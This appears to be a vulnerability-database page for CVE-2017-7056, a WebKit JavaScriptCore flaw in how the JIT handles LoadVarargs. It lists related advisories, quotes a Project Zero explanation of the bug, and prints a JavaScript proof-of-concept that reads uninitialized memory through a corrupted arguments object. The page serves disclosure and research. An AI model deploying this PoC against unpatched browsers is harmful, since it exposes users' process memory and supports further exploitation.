WebKit JSC ArgumentsEliminationPhase::transform Incorrect LoadVarargs Handlin
Reporter | Title | Published | Views | Family All 61 |
---|---|---|---|---|
UbuntuCve | CVE-2017-7056 | 20 Jul 201700:00 | – | ubuntucve |
Cvelist | CVE-2017-7056 | 20 Jul 201716:00 | – | cvelist |
NVD | CVE-2017-7056 | 20 Jul 201716:29 | – | nvd |
Prion | Memory corruption | 20 Jul 201716:29 | – | prion |
Packet Storm | WebKit JSC ArgumentsEliminationPhase::transform Incorrect LoadVarargs Handling | 25 Jul 201700:00 | – | packetstorm |
0day.today | WebKit JSC ArgumentsEliminationPhase::transform Incorrect LoadVarargs Handling Vulnerability | 25 Jul 201700:00 | – | zdt |
CVE | CVE-2017-7056 | 20 Jul 201716:29 | – | cve |
Debian CVE | CVE-2017-7056 | 20 Jul 201716:29 | – | debiancve |
seebug.org | WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform(CVE-2017-7056) | 27 Jul 201700:00 | – | seebug |
Fedora | [SECURITY] Fedora 24 Update: webkitgtk4-2.16.6-1.fc24 | 7 Aug 201720:18 | – | fedora |
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1262
Here is a snippet of ArgumentsEliminationPhase::transform
case LoadVarargs:
...
if (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) {
...
if (argumentCountIncludingThis <= varargsData->limit) {
storeArgumentCountIncludingThis(argumentCountIncludingThis);
// store arguments
...
}
node->remove();
node->origin.exitOK = canExit;
break;
}
Whether or not the "argumentCountIncludingThis <= varargsData->limit" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length.
PoC:
-->
const kArgsLength = 0x101;
let buggy = null;
function inlineFunc() {
if (arguments.length != kArgsLength) {
buggy = arguments;
}
}
class ClassForInine extends inlineFunc {
}
function sleep(ms) {
let start = new Date();
while (new Date() - start < ms);
}
function main() {
let args = new Array(kArgsLength);
args.fill(333 + 1);
args = args.join(', ');
let opt = new Function(`(() => {
new ClassForInine(${args});
})();`);
for (let i = 0; i < 0x100000; i++) {
opt();
if (i === 0x3000)
sleep(1000);
if (buggy) {
print('buggy.length: ' + buggy.length);
break;
}
}
for (let i = 0, n = buggy.length; i < n; i++) {
print(buggy[i]);
}
}
main();
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo